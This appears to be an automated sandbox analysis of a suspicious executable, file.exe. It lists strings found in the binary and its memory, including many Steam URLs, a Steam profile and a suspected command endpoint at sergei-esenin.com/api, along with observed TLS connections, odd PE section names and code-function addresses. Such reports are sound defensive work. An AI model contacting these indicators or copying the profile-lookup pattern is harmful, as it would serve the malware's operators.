    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/.
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/Z$
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiF
    Source: file.exe, 00000001.00000003.2219908926.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000001.00000003.2219908926.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/=l
    Source: file.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/=o
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?su
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000001.00000003.2219908926.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000001.00000003.2219908926.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900J
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A902281_2_00A90228
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00ACA0D01_2_00ACA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A920301_2_00A92030
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C600651_2_00C60065
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A810001_2_00A81000
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC40401_2_00AC4040
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8E1A01_2_00A8E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CE918D1_2_00CE918D
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A871F01_2_00A871F0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A851601_2_00A85160
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B3B15C1_2_00B3B15C
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A812F71_2_00A812F7
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AB82D01_2_00AB82D0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AB12D01_2_00AB12D0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8B3A01_2_00A8B3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A813A31_2_00A813A3
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AB23E01_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8A3001_2_00A8A300
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C563751_2_00C56375
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A944871_2_00A94487
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A9049B1_2_00A9049B
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AB64F01_2_00AB64F0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AAC4701_2_00AAC470
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A835B01_2_00A835B0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BD15921_2_00BD1592
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A885901_2_00A88590
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A9C5F01_2_00A9C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C546871_2_00C54687
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC86F01_2_00AC86F0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C596981_2_00C59698
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00ABF6201_2_00ABF620
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C5E6711_2_00C5E671
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8164F1_2_00A8164F
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC86521_2_00AC8652
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00ABE8A01_2_00ABE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00ABB8C01_2_00ABB8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AB18601_2_00AB1860
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8A8501_2_00A8A850
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC89A01_2_00AC89A0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AA098B1_2_00AA098B
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC7AB01_2_00AC7AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC8A801_2_00AC8A80
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC4A401_2_00AC4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A87BF01_2_00A87BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C51B5D1_2_00C51B5D
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A9DB6F1_2_00A9DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C52B0A1_2_00C52B0A
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC6CBF1_2_00AC6CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B55CF01_2_00B55CF0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AACCD01_2_00AACCD0
